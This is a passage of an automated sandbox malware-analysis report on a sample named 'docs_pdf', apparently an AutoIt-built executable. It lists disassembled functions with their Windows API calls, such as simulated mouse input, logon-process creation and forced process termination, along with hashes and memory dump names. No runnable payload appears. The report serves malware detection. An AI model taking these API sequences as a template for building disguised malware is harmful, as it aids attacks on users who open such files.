                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID:
                                                            • API String ID: 642888154-0
                                                            • Opcode ID: ce1cd3123f9da668c42172442bcd6c1676a8af9e49b800e80d2194496ff36d10
                                                            • Instruction ID: 85eb989919abd3cdc4f11dcbc32a837538d4769e383cd9a494154c922d7bfc48
                                                            • Opcode Fuzzy Hash: ce1cd3123f9da668c42172442bcd6c1676a8af9e49b800e80d2194496ff36d10
                                                            • Instruction Fuzzy Hash: 70413E74648241AFDB26DF24C4C9B957BF1FB05314F1882B9FA5C8F6A2C731A886CB51
                                                            Function 001673B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00165134,?,?,00000000,00000001), ref: 001673BF
                                                              • Part of subcall function 00163C94: GetWindowRect.USER32(?,?), ref: 00163CA7
                                                            • GetDesktopWindow.USER32 ref: 001673E9
                                                            • GetWindowRect.USER32(00000000), ref: 001673F0
                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00167422
                                                              • Part of subcall function 001554E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0015555E
                                                            • GetCursorPos.USER32(?), ref: 0016744E
                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001674AC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                            • String ID:
                                                            • API String ID: 4137160315-0
                                                            • Opcode ID: bfafcca1fca3c176ed9fc65ffb9480fc07271aaf0d136159f869761fc62523bc
                                                            • Instruction ID: 5c506905e089d31e1f015fcb34c37ec665049488649b0137c4e5581af544a225
                                                            • Opcode Fuzzy Hash: bfafcca1fca3c176ed9fc65ffb9480fc07271aaf0d136159f869761fc62523bc
                                                            • Instruction Fuzzy Hash: 1231D272509305AFD720DF14DC49E9BBBAAFF88314F00091DF59897191DB30E959CB92
                                                            Function 00148D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001485F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00148608
                                                              • Part of subcall function 001485F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00148612
                                                              • Part of subcall function 001485F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00148621
                                                              • Part of subcall function 001485F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00148628
                                                              • Part of subcall function 001485F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0014863E
                                                            • GetLengthSid.ADVAPI32(?,00000000,00148977), ref: 00148DAC
                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00148DB8
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00148DBF
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00148DD8
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00148977), ref: 00148DEC
                                                            • HeapFree.KERNEL32(00000000), ref: 00148DF3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 3008561057-0
                                                            • Opcode ID: 6e229a4e9d39f4a169e92c1980c800b6c40eec37700601e7c01d31f6ceb20ba7
                                                            • Instruction ID: c67af6cd4d70be096eecfe8871e5276fc3c1d8cf82724968c0781e997ea5c2d0
                                                            • Opcode Fuzzy Hash: 6e229a4e9d39f4a169e92c1980c800b6c40eec37700601e7c01d31f6ceb20ba7
                                                            • Instruction Fuzzy Hash: A1119A31902A05EBDB149BA4CC09BBF7BBAEB55325F104029E849972A0DB329981DB60
                                                            Function 00148AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00148B2A
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00148B31
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00148B40
                                                            • CloseHandle.KERNEL32(00000004), ref: 00148B4B
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00148B7A
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00148B8E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: 7b383a67a444d2572b5f477fec0e63cc7e82981fc6500c9fa81609c7bb4d7556
                                                            • Instruction ID: 355b2d157dd59b7e73626e97b6d8b964f7fc8cad88004a03888d4b946002f4b1
                                                            • Opcode Fuzzy Hash: 7b383a67a444d2572b5f477fec0e63cc7e82981fc6500c9fa81609c7bb4d7556
                                                            • Instruction Fuzzy Hash: 7F1117B2501249AFDB018FA4ED49FDE7BB9FF08344F144169FA08A2160C7769DA1AB60
                                                            Function 0017C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000F134D
                                                              • Part of subcall function 000F12F3: SelectObject.GDI32(?,00000000), ref: 000F135C
                                                              • Part of subcall function 000F12F3: BeginPath.GDI32(?), ref: 000F1373
                                                              • Part of subcall function 000F12F3: SelectObject.GDI32(?,00000000), ref: 000F139C
                                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0017C1C4
                                                            • LineTo.GDI32(00000000,00000003,?), ref: 0017C1D8
                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0017C1E6
                                                            • LineTo.GDI32(00000000,00000000,?), ref: 0017C1F6
                                                            • EndPath.GDI32(00000000), ref: 0017C206
                                                            • StrokePath.GDI32(00000000), ref: 0017C216
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                            • String ID:
                                                            • API String ID: 43455801-0
                                                            • Opcode ID: 5c14423ac0c1184f19c4ec5192a200d6ee6b9f3acd019ddbe4b7b48f76316325
                                                            • Instruction ID: 4c9caf443fd0f0a9f169c93205a64ab8b3b1a137b71d53db5516c3b140f2d7d7
                                                            • Opcode Fuzzy Hash: 5c14423ac0c1184f19c4ec5192a200d6ee6b9f3acd019ddbe4b7b48f76316325
                                                            • Instruction Fuzzy Hash: 3111097640010CBFDB119F90DC88EEA7FADEB08354F048025BA185A5A2C7719D95DBA0
                                                            Function 001103A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001103D3
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 001103DB
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001103E6
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001103F1
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 001103F9
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00110401
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: 786cd93203e52df3efa184f39ec07bca5dec3e814a1a54ccb91d6c42e32e35e8
                                                            • Instruction ID: 18dcc5a2073779331193044123c368d8b33cca5038426ad3746165417a6080e0
                                                            • Opcode Fuzzy Hash: 786cd93203e52df3efa184f39ec07bca5dec3e814a1a54ccb91d6c42e32e35e8
                                                            • Instruction Fuzzy Hash: 3A0148B09417597DE3008F5A8C85A52FEA8FF19354F00411BA15C47941C7B5A864CBE5
                                                            Function 0015568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0015569B
                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001556B1
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 001556C0
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001556CF
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001556D9
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001556E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: 23a372bcaadde392dc618c825532aed3492a4372416e55a551cf3ec2f45c3bf6
                                                            • Instruction ID: 2006fe90efe804efdbef060c950003ccd4bfa09bb3da1f091c4807d0195f88e3
                                                            • Opcode Fuzzy Hash: 23a372bcaadde392dc618c825532aed3492a4372416e55a551cf3ec2f45c3bf6
                                                            • Instruction Fuzzy Hash: 32F03032245158BBE7215BA2DC0DEEF7B7CEFCAB11F00016DFA08D1450D7A11A82C6B5
                                                            Function 001574D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 001574E5
                                                            • EnterCriticalSection.KERNEL32(?,?,00101044,?,?), ref: 001574F6
                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00101044,?,?), ref: 00157503
                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00101044,?,?), ref: 00157510
                                                              • Part of subcall function 00156ED7: CloseHandle.KERNEL32(00000000,?,0015751D,?,00101044,?,?), ref: 00156EE1
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00157523
                                                            • LeaveCriticalSection.KERNEL32(?,?,00101044,?,?), ref: 0015752A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: ec68049093593762761de8969e8f98ad7e6e33865add2c0d65efd2ecbbf62a3c
                                                            • Instruction ID: ed8fbc2dbc1258a60fe4fa77540082000a13eb6a45c22eb36a5c6e775c909e4b
                                                            • Opcode Fuzzy Hash: ec68049093593762761de8969e8f98ad7e6e33865add2c0d65efd2ecbbf62a3c
                                                            • Instruction Fuzzy Hash: FDF03A3A144612EBDB111B64FC899EB773AFF45302F400539F606958A2DB7598C6CAA0
                                                            Function 00148E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00148E7F
                                                            • UnloadUserProfile.USERENV(?,?), ref: 00148E8B
                                                            • CloseHandle.KERNEL32(?), ref: 00148E94
                                                            • CloseHandle.KERNEL32(?), ref: 00148E9C
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00148EA5
                                                            • HeapFree.KERNEL32(00000000), ref: 00148EAC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: cd2b7a043599d21f1ac3e1d8d45a2d432b973a59ebefc9e308c2a7e1b09523f2
                                                            • Instruction ID: 16c0ed66f6ba8d8803f836147f8af08fd186783598efc1ac37909c48db2474e9
                                                            • Opcode Fuzzy Hash: cd2b7a043599d21f1ac3e1d8d45a2d432b973a59ebefc9e308c2a7e1b09523f2
                                                            • Instruction Fuzzy Hash: 4EE05276104505FBDA011FF5EC0C95ABB79FB89762B608639F21D82870CB3294E2DB60
                                                            Function 00168902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00168928
                                                            • CharUpperBuffW.USER32(?,?), ref: 00168A37
                                                            • VariantClear.OLEAUT32(?), ref: 00168BAF
                                                              • Part of subcall function 00157804: VariantInit.OLEAUT32(00000000), ref: 00157844
                                                              • Part of subcall function 00157804: VariantCopy.OLEAUT32(00000000,?), ref: 0015784D
                                                              • Part of subcall function 00157804: VariantClear.OLEAUT32(00000000), ref: 00157859
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: 14cc8fd05b28ae0eaef624c25aa9c2ef8b5f4ef90139f227a8f40eb398a7ba50
                                                            • Instruction ID: baf24daa73a9e35ae76d2fc9ee20ea0d742674eaf4fb3f566fcb829ef8b5683e
                                                            • Opcode Fuzzy Hash: 14cc8fd05b28ae0eaef624c25aa9c2ef8b5f4ef90139f227a8f40eb398a7ba50
                                                            • Instruction Fuzzy Hash: 319190716083059FC714DF28C88596BBBF4EF89314F044A6EF99A8B362DB31E945CB52
                                                            Function 00152F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0010FEC6: _wcscpy.LIBCMT ref: 0010FEE9
                                                            • _memset.LIBCMT ref: 00153077
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001530A6
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00153159
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00153187
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 4152858687-4108050209
                                                            • Opcode ID: 5f978afc35387b51f2b6eb337112e7535dfa8b88f635787732e618b48354340d
                                                            • Instruction ID: 480a9b8af946de780c10ec42718d1e02c04f76a74166e60058329a5b3708f068
                                                            • Opcode Fuzzy Hash: 5f978afc35387b51f2b6eb337112e7535dfa8b88f635787732e618b48354340d
                                                            • Instruction Fuzzy Hash: 2F51A232608700DAD7199F38D8856ABB7E4EF55391F04092DFDB5DB1D1DB70CA888792
                                                            Function 0014DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0014DAC5
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0014DAFB
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0014DB0C
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0014DB8E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: DllGetClassObject
                                                            • API String ID: 753597075-1075368562
                                                            • Opcode ID: bbf8df6739e77d1276af9c2d25143e5a96d062127900a29a58ae6e59edce31fe
                                                            • Instruction ID: 0228e25f0cdfef452f3f67be395478258aa0269223b24739523272a3583f3cb5
                                                            • Opcode Fuzzy Hash: bbf8df6739e77d1276af9c2d25143e5a96d062127900a29a58ae6e59edce31fe
                                                            • Instruction Fuzzy Hash: 12416FB1600208EFDF15CF54D885A9A7BB9EF45350F1680AEED099F225D7B1DE44CBA0
                                                            Function 00152C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00152CAF
                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00152CCB
                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00152D11
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001B6890,00000000), ref: 00152D5A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem_memset
                                                            • String ID: 0
                                                            • API String ID: 1173514356-4108050209
                                                            • Opcode ID: 44b9bf03da39bae3631e760459ed23b99526db2cfbfaa9bf04db14dbcaf729cf
                                                            • Instruction ID: a5fe49b4d6fd05bd631f83c1f2b1996eb29fe919e7118b810e7bef04ac32c036
                                                            • Opcode Fuzzy Hash: 44b9bf03da39bae3631e760459ed23b99526db2cfbfaa9bf04db14dbcaf729cf
                                                            • Instruction Fuzzy Hash: 84417E32204302DFD724DF64C845B5ABBE8AF86321F14466EF9759B291D770E909CB92
                                                            Function 0016DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0016DAD9
                                                              • Part of subcall function 000F79AB: _memmove.LIBCMT ref: 000F79F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower_memmove
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 3425801089-567219261
                                                            • Opcode ID: 1eb739734e2c6226334a1098ff51ad0a107a9a5234dd109bf765e38dc58e63c5
                                                            • Instruction ID: 054d3975eb39d84c2c84fc858a1c56a6b4a5f450f4ade11941d19fd18d8a675b
                                                            • Opcode Fuzzy Hash: 1eb739734e2c6226334a1098ff51ad0a107a9a5234dd109bf765e38dc58e63c5
                                                            • Instruction Fuzzy Hash: 9A31E670A046199FCF00EF94DC818FEB3B4FF16320B018A29E925A76D6CB71A955CB80
                                                            Function 00149372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                              • Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001493F6
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00149409
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00149439
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
